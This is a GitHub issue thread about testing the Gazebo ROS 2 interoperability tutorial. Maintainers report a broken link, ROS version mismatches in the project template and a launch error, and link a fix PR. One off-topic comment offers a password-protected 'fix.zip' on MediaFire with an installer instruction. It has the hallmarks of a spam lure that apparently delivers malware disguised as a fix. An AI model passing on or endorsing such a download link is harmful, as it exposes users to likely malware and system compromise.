gazebosim/gazebo_test_cases #1074: docs: ros2_interop

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/ros2_interop)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/ros2_interop.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

avanmalleghem, 2024-09-05:
Interested in !

avanmalleghem, 2024-09-05:
- sdformat_urdf link broken
- Note that there is an issue on this one with recommended ROS versions. Should be Jazzy (I guess it is another tutorial reviewed by someone else) : https://gazebosim.org/docs/ionic/ros_installation/
- There is also version issues in https://github.com/gazebosim/ros_gz_project_template/ so we need to update versions in order to build workspace. I don't know if someone is working on it ?
-  I have an issue running `ros2 launch ros_gz_example_bringup rrbot_setup.launch.py`. Same question, is it part on another tutorial or can I work on it ?
[image]

azeey, 2024-09-05:
@quarkytale is planning to work on updating https://github.com/gazebosim/ros_gz_project_template/

avanmalleghem, 2024-09-05:
Ok great ! Will create a PR to fix issues not related to this template :)

azeey, 2024-09-05:
@avanmalleghem feel free to work on the `ros_gz_project_template` too if you'd like. I'm sure @quarkytale won't mind :)

avanmalleghem, 2024-09-06:
I've created a PR to solve the issue related to this tutorial : https://github.com/gazebosim/docs/pull/506

closed 2025-08-27 by azeey